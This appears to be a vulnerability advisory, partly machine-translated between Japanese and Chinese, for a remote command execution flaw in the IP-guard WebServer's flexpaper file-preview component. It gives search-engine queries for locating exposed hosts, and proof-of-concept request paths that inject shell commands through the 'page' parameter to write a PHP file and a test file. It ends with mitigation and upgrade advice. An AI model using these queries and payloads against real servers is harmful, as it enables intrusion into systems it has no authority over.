1. 脆弱性の説明
IP-guard は、Yixin Technology Co., Ltd. が開発した端末セキュリティ管理ソフトウェアです。企業が端末機器のセキュリティ、データ セキュリティを保護し、ネットワーク使用状況を管理し、IT システム管理を簡素化できるように設計されています。
IP ガード Web サーバーのリモート コマンド実行の脆弱性 (RCE) の問題は、古いバージョンの承認用のファイル プレビュー機能がオープン ソースのプラグイン フレックスペーパーを使用しており、使用されているプラグインのバージョンが原因で発生します。リモート コマンド実行機能があります。バグのため、新しいバージョンではフレックスペーパーが使用されなくなりました。
2. 影響を受けるバージョン
影響を受ける範囲には、ファイルプレビュー機能を使用するWebシステムが含まれます。
溢信科技 IP-guard<4.81.0307.0
3. アセットマッピング
Fofa语法:
app="IP-guard"
Hunter语法:
web.title="IP-guard"
4. 脆弱性の再発
1. Web アクセス インターフェイスに移動します
2. bp パケットのキャプチャとデータ パケットの変更
poc:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Esany.php
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+123456+>test.txt
/ipg/static/appr/lib/flexpaper/php/test.txt
書き込まれたコマンドは実行される可能性があり、重大な損害を引き起こす可能性があります。
5. 修理のご提案
一時保護計画:
1.加强系统和网络的访问控制,修改防火墙策略,不将非必要服务暴露于公网;
2.在公网部署的系统,通过WAF限制外网对"/ipg/static/appr/lib/flexpaper/php/view.php"路径的访问;
3.定期对服务器上的网站后门文件进行及时查杀。
正式な保護計画:
官方已修复该漏洞,建议用户更新到安全版本。
安全版本:
IP-guard WebServer >= 4.81.0307.0
下载链接:
https://www.ip-guard.net/